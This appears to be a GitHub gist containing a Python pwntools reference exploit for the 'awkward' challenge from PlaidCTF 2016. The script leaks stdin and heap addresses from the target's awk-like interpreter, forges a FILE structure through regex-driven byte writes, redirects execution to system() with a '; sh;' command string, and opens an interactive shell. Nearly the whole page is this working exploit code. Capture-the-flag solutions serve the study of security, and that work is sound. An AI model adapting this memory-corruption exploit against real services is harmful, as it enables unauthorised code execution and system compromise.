Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Reference exploit for awkward from PlaidCTF 2016
from pwn import *
import struct
def write_byte(idx, val):
val &= 0xFF
s = []
for i in xrange(8):
if val & (1 << i):
if i == 0:
s.append(chr(256-(idx*8)))
else:
s.append(chr((248-(idx*8)) | i))
return ''.join(s)
r = remote('localhost', 2323)
prog = '''
/foo/ { printf "%s", $2 + 0; }
/bar/ { print "abcd" ~ $2; j = $3; }
FINISH { print "done"; }
'''
r.send(prog)
r.recvuntil('done\n')
r.send('foo %d\n' % 0x08052081)
stdin_addr = struct.unpack('<I', '\x00'+r.recvuntil('done\n')[:3])[0]
print 'stdin @ 0x%08x' % stdin_addr
r.send('foo -%d\n' % (0x100000000 - (stdin_addr + 624)))
heap_addr = struct.unpack('<I', r.recvuntil('done\n')[:4])[0]
print 'heap @ 0x%08x' % heap_addr
io_addr = heap_addr - 13328 - 0xf0 - 0x70
io_addr &= ~0xfff
io_addr += 8
print 'io @ 0x%08x' % io_addr
data = 'A'
data += '\x80' * 0x4 + '; sh;'.ljust(0x42, '#')
data += '\x46' * 0x94
data += struct.pack('<I', io_addr + 0x50 + 0x100)
data = data.ljust(0x121, 'B')
data += struct.pack('<I', stdin_addr - 0x17c480) # system
r.send(data + '\n')
regex = write_byte(5, io_addr >> 24)
regex += write_byte(6, io_addr >> 16)
regex += write_byte(7, io_addr >> 8)
regex += write_byte(8, io_addr >> 0)
fake_file = struct.pack('<I', io_addr + 0x50)
r.send('bar [%s] %s\n' % (regex, fake_file + "bbbbcccccccc"))
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment